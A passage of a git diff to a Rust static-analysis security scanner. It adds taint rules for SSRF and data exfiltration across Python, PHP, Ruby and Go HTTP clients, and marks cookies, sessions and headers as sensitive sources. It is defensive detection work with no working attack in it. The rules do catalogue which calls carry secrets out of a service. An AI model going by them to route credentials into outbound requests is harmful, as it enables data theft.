SourceKind::Unknown => Sensitivity::Sensitive, + } + } +} + /// Infer the source kind from capabilities and callee name. pub fn infer_source_kind(caps: Cap, callee: &str) -> SourceKind { let cl = callee.to_ascii_lowercase(); + // Cookie / Header are checked *before* the generic user-input bucket + // because they imply higher sensitivity (auth material, session ids). + // The generic UserInput substrings (`request`, `header`, `cookie`) + // would otherwise swallow these. + // + // Session stores carry auth material (CSRF tokens, signed user ids) of + // the same sensitivity tier as raw cookies, so route them through the + // `Cookie` arm. The substring is checked AFTER excluding the + // capitalised `Session` constructor (covered by the `request` / + // `requests` checks below not firing for `Session` builders). + if cl.contains("cookie") || cl.contains("session") { + return SourceKind::Cookie; + } + if cl.contains("header") { + return SourceKind::Header; + } + // User input patterns if cl.contains("argv") || cl.contains("stdin") @@ -498,11 +578,23 @@ pub fn infer_source_kind(caps: Cap, callee: &str) -> SourceKind { || cl.contains("params") || cl.contains("input") || cl.contains("body") - || cl.contains("header") - || cl.contains("cookie") || cl.contains("location") || cl.contains("document.url") || cl.contains("document.referrer") + // PHP superglobals: the AST text preserves the `$` (member-text + // extraction reads the `variable_name` node verbatim) so we match + // both `$_POST` and the `_POST` form some collectors emit. + // `$_REQUEST` already matches via the `request` substring above; + // `$_COOKIE` / `$_SESSION` route through the Cookie tier earlier in + // the function. `$_SERVER` is operator-state-bearing (auth headers + // etc.) so it stays Sensitive by falling through to the Unknown + // bucket. + || cl == "$_get" + || cl == "$_post" + || cl == "$_files" + || cl == "_get" + || cl == "_post" + || cl == "_files" { return SourceKind::UserInput; } @@ -542,6 +634,8 @@ pub fn infer_source_kind(caps: Cap, callee: &str) -> SourceKind { pub fn severity_for_source_kind(kind: SourceKind) -> crate::patterns::Severity { match kind { SourceKind::UserInput => crate::patterns::Severity::High, + SourceKind::Cookie => crate::patterns::Severity::High, + SourceKind::Header => crate::patterns::Severity::High, SourceKind::EnvironmentConfig => crate::patterns::Severity::High, SourceKind::FileSystem => crate::patterns::Severity::Medium, SourceKind::Database => crate::patterns::Severity::Medium, @@ -986,11 +1080,20 @@ pub fn classify_gated_sink( None => return out, }; + // Match against the original callee text AND a chain-normalised form + // that strips `()` between dots so a chained construction like + // `httpx.AsyncClient().post` matches a gate matcher of + // `httpx.AsyncClient.post`. Mirrors the normalisation applied by + // `classify` for flat label rules. let callee_bytes = callee_text.as_bytes(); + let normalized = normalize_chained_call(callee_text); + let normalized_bytes = normalized.as_bytes(); for gate in *gates { let matcher = gate.callee_matcher.as_bytes(); - if !match_suffix_cs(callee_bytes, matcher, gate.case_sensitive) { + if !match_suffix_cs(callee_bytes, matcher, gate.case_sensitive) + && !match_suffix_cs(normalized_bytes, matcher, gate.case_sensitive) + { continue; } @@ -1473,26 +1576,69 @@ mod tests { // CVE Hunt Session 2 (Go CVE-2023-3188 Owncast SSRF): // `http.DefaultClient.Get/Post/Head/Do/PostForm` is the idiomatic Go // SSRF sink shape (`http.DefaultClient` is the package-level shared - // `*http.Client`). Bare `Get`/`Post` matchers would over-match - // unrelated method names; the explicit `http.DefaultClient.*` matcher - // restricts the suffix-match to the stdlib helper while leaving - // user-defined `myClient.Get` alone (no false positives). + // `*http.Client`). These callees migrated from a flat `Sink(SSRF)` + // rule to destination-aware gated sinks so that DATA_EXFIL gates can + // coexist on the same callee (e.g. `http.DefaultClient.Post(url, _, + // body)` carries SSRF on arg 0 and DATA_EXFIL on arg 2). The + // assertions below check the gate registration rather than the flat + // classifier output. #[test] - fn classify_go_http_default_client_get_is_ssrf_sink() { - let result = classify("go", "http.DefaultClient.Get", None); - assert_eq!(result, Some(DataLabel::Sink(Cap::SSRF))); + fn classify_go_http_default_client_get_is_ssrf_gate() { + let no_kw = |_: &str| None; + let no_kw_present = |_: &str| false; + let result = classify_gated_sink( + "go", + "http.DefaultClient.Get", + |_| None, + no_kw, + no_kw_present, + ); + assert!( + result.iter().any(|m| m.label == DataLabel::Sink(Cap::SSRF)), + "expected SSRF gate match, got {result:?}" + ); } #[test] - fn classify_go_http_default_client_post_is_ssrf_sink() { - let result = classify("go", "http.DefaultClient.Post", None); - assert_eq!(result, Some(DataLabel::Sink(Cap::SSRF))); + fn classify_go_http_default_client_post_is_ssrf_and_data_exfil_gate() { + let no_kw = |_: &str| None; + let no_kw_present = |_: &str| false; + let result = classify_gated_sink( + "go", + "http.DefaultClient.Post", + |_| None, + no_kw, + no_kw_present, + ); + assert!( + result.iter().any(|m| m.label == DataLabel::Sink(Cap::SSRF)), + "expected SSRF gate match, got {result:?}" + ); + assert!( + result + .iter() + .any(|m| m.label == DataLabel::Sink(Cap::DATA_EXFIL)), + "expected DATA_EXFIL gate match, got {result:?}" + ); } #[test] - fn classify_go_http_default_client_do_is_ssrf_sink() { - let result = classify("go", "http.DefaultClient.Do", None); - assert_eq!(result, Some(DataLabel::Sink(Cap::SSRF))); + fn classify_go_http_default_client_do_is_data_exfil_gate() { + let no_kw = |_: &str| None; + let no_kw_present = |_: &str| false; + let result = classify_gated_sink( + "go", + "http.DefaultClient.Do", + |_| None, + no_kw, + no_kw_present, + ); + assert!( + result + .iter() + .any(|m| m.label == DataLabel::Sink(Cap::DATA_EXFIL)), + "expected DATA_EXFIL gate match, got {result:?}" + ); } #[test] diff --git a/src/labels/php.rs b/src/labels/php.rs index 533572ad..ed287806 100644 --- a/src/labels/php.rs +++ b/src/labels/php.rs @@ -1,4 +1,6 @@ -use crate::labels::{Cap, DataLabel, Kind, LabelRule, ParamConfig, RuntimeLabelRule}; +use crate::labels::{ + Cap, DataLabel, GateActivation, Kind, LabelRule, ParamConfig, RuntimeLabelRule, SinkGate, +}; use crate::utils::project::{DetectedFramework, FrameworkContext}; use phf::{Map, phf_map}; @@ -138,8 +140,67 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, + // ── Cross-boundary data exfiltration ────────────────────────────────── + // + // Body-bearing outbound HTTP verb methods on the major PHP HTTP clients. + // Flat sinks here compose with the SSRF rule on `curl_exec` / + // `file_get_contents` via multi-label classification. The + // source-sensitivity gate in `effective_sink_caps` strips DATA_EXFIL + // when the contributing source is `Plain` (`$_GET`, `$_POST`, `$_REQUEST`), + // so this only fires for sensitive sources (cookies / sessions / + // server-side state / env / file / db reads). + // + // Covered clients: + // * `Guzzle\Client::post/put/patch` — guzzlehttp/guzzle + // matched by suffix on the verb method (chained `$client->post(...)`). + // * `Symfony\HttpClient::request` — symfony/http-client + // request($method, $url, ['body' => $payload, 'json' => $data, ...]) + // * `Http::post` — Laravel HTTP facade (over Guzzle) + LabelRule { + matchers: &[ + "Client.post", + "Client.put", + "Client.patch", + "Client.request", + "HttpClient.post", + "HttpClient.put", + "HttpClient.patch", + "HttpClient.request", + "Http.post", + "Http.put", + "Http.patch", + ], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: true, + }, ]; +/// Gated sinks for PHP. +/// +/// `curl_setopt($ch, CURLOPT_POSTFIELDS, $payload)` is the canonical +/// non-OO PHP HTTP-egress payload binding. The activation arg (index 1) is +/// a `define`d constant: `CURLOPT_POSTFIELDS` (and the byref-copying variant +/// `CURLOPT_COPYPOSTFIELDS`) carry the request body, while other CURLOPT_* +/// constants designate URL / auth / TLS / behaviour, none of which is +/// DATA_EXFIL-relevant. Gating on the constant identifier keeps the rule +/// from over-firing on `curl_setopt($ch, CURLOPT_URL, $url)` (covered +/// elsewhere by the `curl_exec` SSRF flat sink). +/// +/// Identifier-based activation is enabled via the macro-arg fallback in +/// `cfg::mod::classify_gated_sink` for `lang == "php"`. +pub static GATED_SINKS: &[SinkGate] = &[SinkGate { + callee_matcher: "curl_setopt", + arg_index: 1, + dangerous_values: &["CURLOPT_POSTFIELDS", "CURLOPT_COPYPOSTFIELDS"], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: true, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::ValueMatch, +}]; + pub static KINDS: Map<&'static str, Kind> = phf_map! { // control-flow "if_statement" => Kind::If, diff --git a/src/labels/python.rs b/src/labels/python.rs index ff00110d..a955f7b8 100644 --- a/src/labels/python.rs +++ b/src/labels/python.rs @@ -44,6 +44,34 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Source(Cap::all()), case_sensitive: false, }, + // Session stores: session cookies / DRF / Django auth carry auth material + // the operator did not intend to leak. `infer_source_kind` maps `session` + // callees to `SourceKind::Cookie` (Sensitive) so flowing into an outbound + // request payload fires `DATA_EXFIL`. Case-sensitive: lowercase `session` + // here is the Flask global / Django request attribute; the capitalised + // `requests.Session` constructor is a client object, not a source, and + // must not be tagged. + // + // The matchers cover both attribute access (`request.session.user_id`, + // resolved as the attribute text) and the bare `session.` + // pattern that follows `from flask import session`. The `=session` + // exact-match form fires only when the call is the bare top-level + // `session(...)` so accidental field projections like + // `obj.client.session` (Phase 2 chained-receiver lowering) don't get + // mis-labelled as sources. + LabelRule { + matchers: &[ + "request.session", + "flask_request.session", + "flask.session", + "django.contrib.sessions", + "=session", + "session.get", + "session.pop", + ], + label: DataLabel::Source(Cap::all()), + case_sensitive: true, + }, // Django-specific sources (case-sensitive to avoid request.get() dict method FP) LabelRule { matchers: &[ @@ -208,58 +236,25 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sanitizer(Cap::FILE_IO), case_sensitive: false, }, + // Outbound HTTP — flat SSRF sinks for read-shaped methods (GET / HEAD) + // that don't carry a body. Body-bearing methods (POST / PUT / PATCH / + // DELETE / request) are modelled via destination-aware gates in + // GATED_SINKS so SSRF activation can be narrowed to the URL position + // and the cross-boundary `DATA_EXFIL` cap can attach to body kwargs as + // a separate gate. `urllib.request.urlopen` stays flat: its argument + // is a Request object whose payload-vs-URL split happens at + // `urllib.request.Request` construction (gated below). LabelRule { matchers: &[ "urllib.request.urlopen", "requests.get", - "requests.post", - "requests.put", - "requests.delete", - "requests.patch", "requests.head", - "requests.request", "httpx.get", - "httpx.post", - "httpx.put", - "httpx.delete", - "httpx.patch", "httpx.head", - "httpx.request", - ], - label: DataLabel::Sink(Cap::SSRF), - case_sensitive: false, - }, - // aiohttp HTTP client, SSRF sinks - LabelRule { - matchers: &[ "aiohttp.get", - "aiohttp.post", - "aiohttp.put", - "aiohttp.delete", - "aiohttp.request", - ], - label: DataLabel::Sink(Cap::SSRF), - case_sensitive: false, - }, - // Type-qualified SSRF sinks: when the receiver is tracked as - // TypeKind::HttpClient (e.g. `client = requests.Session()`, - // `client = httpx.Client()`, or `s = aiohttp.ClientSession()`), - // resolve_type_qualified_labels() constructs `"HttpClient."` - // call texts so the receiver-name is no longer load-bearing. Matches - // the existing Rust HttpClient. sink set so both languages - // stay in step on the type-aware SSRF model. Motivated by the - // upstream LMDeploy CVE-2026-33626 shape: - // client = requests.Session() - // response = client.get(url, ...) - LabelRule { - matchers: &[ + "aiohttp.head", "HttpClient.get", - "HttpClient.post", - "HttpClient.put", - "HttpClient.delete", - "HttpClient.patch", "HttpClient.head", - "HttpClient.request", "HttpClient.send", ], label: DataLabel::Sink(Cap::SSRF), @@ -332,6 +327,687 @@ pub static GATED_SINKS: &[SinkGate] = &[ dangerous_kwargs: &[("shell", &["True", "true"])], activation: GateActivation::ValueMatch, }, + // ── Outbound HTTP clients (SSRF + cross-boundary data exfiltration) ─── + // + // Body-bearing methods (POST / PUT / PATCH / DELETE / request) are + // gated by destination so that: + // * SSRF fires only when taint reaches the URL position (arg 0). + // * `DATA_EXFIL` fires only when taint reaches a body kwarg (`data` / + // `json` / `files` for requests / aiohttp; `content` / `data` / + // `json` / `files` for httpx). + // The pair lets a single `requests.post(taintedUrl, data=secret)` call + // report SSRF on the URL flow and DATA_EXFIL on the body flow as + // independent findings rather than a conflated combined cap. + // + // CFG-level kwarg-aware extraction (see `extract_destination_kwarg_pairs`) + // walks `keyword_argument` siblings and routes matching idents into the + // gate's `destination_uses` so the SSA sink scan only fires when the + // body kwarg itself is tainted. + // + // The source-sensitivity gate in `ast.rs` strips DATA_EXFIL when the + // contributing source is `Sensitivity::Plain` (raw `request.args`, + // `request.form`), so plain user input forwarded to a POST body does + // not surface — only sensitive sources (cookies, sessions, env, headers) + // produce a DATA_EXFIL finding. + SinkGate { + callee_matcher: "requests.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "requests.put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "requests.patch", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.patch", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "requests.delete", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.delete", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + // requests.request(method, url, ...) — note the URL is at arg 1, not + // arg 0; method is at arg 0. Body kwargs at arg 2+ via kwarg expansion. + SinkGate { + callee_matcher: "requests.request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.request", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + // httpx — `content` is httpx's raw-bytes body kwarg; `data` covers + // form-encoded; `json` covers JSON-encoded; `files` covers multipart. + SinkGate { + callee_matcher: "httpx.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "httpx.put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "httpx.patch", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.patch", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "httpx.delete", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.delete", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + // httpx.request(method, url, ...) — same shape as requests.request. + SinkGate { + callee_matcher: "httpx.request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.request", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + // Type-qualified variants: `requests.Session()`, `httpx.Client()`, + // `httpx.AsyncClient()`, `aiohttp.ClientSession()` instances all resolve + // to the synthetic `HttpClient.` callee text via + // `resolve_type_qualified_labels`. Covering both module-level and + // type-qualified forms ensures `s = requests.Session(); s.post(url, data=x)` + // and `client = httpx.AsyncClient(); await client.post(url, json=x)` both + // fire SSRF on the URL and DATA_EXFIL on the body kwarg. + SinkGate { + callee_matcher: "HttpClient.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "HttpClient.put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "HttpClient.patch", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.patch", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "HttpClient.delete", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.delete", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "HttpClient.request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.request", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + // aiohttp module-level (`aiohttp.post`, `aiohttp.put`, etc.) — uncommon + // in real code (idiomatic usage is `async with aiohttp.ClientSession()`), + // covered for completeness. ClientSession. dispatches via the + // type-qualified `HttpClient.` gates above. + SinkGate { + callee_matcher: "aiohttp.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "aiohttp.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json"], + }, + }, + SinkGate { + callee_matcher: "aiohttp.put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "aiohttp.put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json"], + }, + }, + SinkGate { + callee_matcher: "aiohttp.request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "aiohttp.request", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json"], + }, + }, + // Chained-construction variants: `httpx.AsyncClient().post(url, json=x)` + // / `httpx.Client().post(url, ...)` / `aiohttp.ClientSession().post(...)`. + // Chain-normalisation strips `()` between dots so the callee text + // becomes `httpx.AsyncClient.post`; gate matching applies to that + // normalised form so the chained shape is covered without binding to + // an intermediate variable. + SinkGate { + callee_matcher: "httpx.AsyncClient.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.AsyncClient.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "httpx.Client.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.Client.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "aiohttp.ClientSession.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "aiohttp.ClientSession.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json"], + }, + }, + SinkGate { + callee_matcher: "requests.Session.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.Session.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + // urllib.request.urlopen(req) — when req is a `urllib.request.Request` + // built with the `data` kwarg, that kwarg becomes the POST body. The + // gate fires on `Request(url, data=tainted)` directly: the constructor + // does not egress, but the convention is that wrapping data in a Request + // means egress is imminent (the urllib.request.Request → urlopen path). + // This is a heuristic — the real egress happens at urlopen, but tracking + // the data flow through the constructor is a fair static approximation. + SinkGate { + callee_matcher: "urllib.request.Request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data"], + }, + }, ]; pub static KINDS: Map<&'static str, Kind> = phf_map! { diff --git a/src/labels/ruby.rs b/src/labels/ruby.rs index cceecead..0dc5d1ac 100644 --- a/src/labels/ruby.rs +++ b/src/labels/ruby.rs @@ -28,6 +28,16 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Source(Cap::all()), case_sensitive: false, }, + // Sensitive request state: cookies and session stores carry auth material + // / CSRF tokens / signed user ids the operator did not intend to leak. + // `infer_source_kind` routes substrings containing "cookie" or "session" + // through `SourceKind::Cookie` (Sensitive), so flow into outbound request + // payloads activates the `DATA_EXFIL` cap added below. + LabelRule { + matchers: &["request.cookies", "request.session", "cookies", "session"], + label: DataLabel::Source(Cap::all()), + case_sensitive: false, + }, // ───────── Sanitizers ────────── LabelRule { matchers: &["CGI.escapeHTML", "ERB::Util.html_escape"], @@ -135,6 +145,55 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, + // ── Cross-boundary data exfiltration ────────────────────────────────── + // + // Body-bearing outbound HTTP verb methods. A flat Sink(DATA_EXFIL) here + // composes with the SSRF rule above via multi-label classification: + // `Net::HTTP.post(uri, payload)` reports SSRF on the URL flow (arg 0) + // and DATA_EXFIL on the body flow (arg 1+) as separate findings. The + // source-sensitivity gate in `effective_sink_caps` strips DATA_EXFIL + // when the contributing source is `Plain` (raw `params`), so this only + // fires for sensitive sources (cookies / session / env / headers / + // file / db reads). + // + // Covered clients: + // * 